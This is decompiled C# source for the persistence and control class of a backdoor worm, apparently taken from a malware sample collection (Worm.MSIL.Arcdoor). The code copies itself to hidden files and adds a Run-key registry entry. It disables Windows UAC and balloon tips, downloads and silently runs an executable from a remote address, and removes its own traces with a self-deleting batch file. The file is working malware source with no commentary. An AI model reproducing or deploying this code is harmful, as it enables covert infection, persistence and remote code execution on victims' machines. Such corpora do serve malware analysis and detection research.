MalwareSourceCode/MSIL/Worm/MSIL/A/Worm.MSIL.Arcdoor.bnb-2ba0542fbb07307543e432f53a360961fd7e6507d83c004424a2e44ed30b4dbc/cSystem.cs

// Decompiled with JetBrains decompiler
// Type: Stub.cSystem
// Assembly: N0ise, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 21609AF2-EC6A-4FAA-88B3-5930EE31DBBA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.MSIL.Arcdoor.bnb-2ba0542fbb07307543e432f53a360961fd7e6507d83c004424a2e44ed30b4dbc.exe

using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;

namespace Stub
{
  internal class cSystem
  {
    private Mutex zMutex;

    public void loadSystem()
    {
      this.createMutex();
      this.DisableProcedures();
      this.InstallBot();
    }

    private void createMutex()
    {
      try
      {
        this.zMutex = new Mutex(true, cMain.ConfigClass.sMutex);
        this.zMutex.ReleaseMutex();
      }
      catch
      {
        Environment.Exit(-1);
      }
    }

    private void InstallBot()
    {
      string fileName = Process.GetCurrentProcess().MainModule.FileName;
      if (this.checkInstall())
        return;
      try
      {
        foreach (string str in cMain.ConfigClass.sFilePath)
        {
          if (!cMain.FunctionClass.checkFile(str))
            System.IO.File.Copy(fileName, str);
          System.IO.File.SetAttributes(str, FileAttributes.Hidden);
        }
      }
      catch
      {
      }
      try
      {
        Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue(cMain.ConfigClass.sRegName[0], (object) ('"'.ToString() + cMain.ConfigClass.sFilePath[0] + (object) '"'));
      }
      catch
      {
      }
      try
      {
        this.zMutex.Close();
        foreach (string str in cMain.ConfigClass.sFilePath)
          new Process()
          {
            StartInfo = {
              FileName = str,
              WindowStyle = ProcessWindowStyle.Hidden
            }
          }.Start();
      }
      catch
      {
      }
      Environment.Exit(-1);
    }

    public void updateBot(string sFileAddress)
    {
      try
      {
        this.zMutex.Close();
      }
      catch
      {
      }
      try
      {
        string str = cMain.FunctionClass.genString(new Random().Next(5, 12)) + ".exe";
        new WebClient().DownloadFile(sFileAddress, Environment.GetEnvironmentVariable("TEMP") + "\\" + str);
        new Process()
        {
          StartInfo = {
            FileName = (Environment.GetEnvironmentVariable("TEMP") + "\\" + str),
            WindowStyle = ProcessWindowStyle.Hidden
          }
        }.Start();
      }
      catch
      {
      }
      this.SelfDestruct();
      Environment.Exit(-1);
    }

    public void RemoveBot()
    {
      try
      {
        Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).DeleteValue(cMain.ConfigClass.sRegName[0]);
        Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).DeleteValue(cMain.ConfigClass.sRegName[1]);
      }
      catch
      {
      }
      try
      {
        foreach (string path in cMain.ConfigClass.sFilePath)
          System.IO.File.Delete(path);
      }
      catch
      {
      }
      this.SelfDestruct();
      Environment.Exit(-1);
    }

    private bool checkInstall()
    {
      string[] sFilePath = cMain.ConfigClass.sFilePath;
      int index = 0;
      if (index < sFilePath.Length)
      {
        string FilePath = sFilePath[index];
        if (!cMain.FunctionClass.checkFile(FilePath))
          return false;
      }
      return true;
    }

    private void SelfDestruct()
    {
      try
      {
        string str = ":RP\ndel " + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + "\nif exist " + (object) '"' + Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName) + (object) '"' + " goto RP";
        TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable("TEMP") + "\\delete.bat");
        textWriter.WriteLine(str);
        textWriter.Close();
        new Process()
        {
          StartInfo = {
            FileName = (Environment.GetEnvironmentVariable("TEMP") + "\\delete.bat"),
            UseShellExecute = false,
            CreateNoWindow = true
          }
        }.Start();
      }
      catch
      {
      }
    }

    private void DisableProcedures()
    {
      if (!cMain.ConfigClass.bDisableUAC)
        return;
      try
      {
        Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", true).SetValue("EnableBalloonTips", (object) "0", RegistryValueKind.DWord);
      }
      catch
      {
      }
      try
      {
        Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true).SetValue("EnableLUA", (object) "0", RegistryValueKind.DWord);
        Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true).SetValue("EnableLUA", (object) "0", RegistryValueKind.DWord);
      }
      catch
      {
      }
    }
  }
}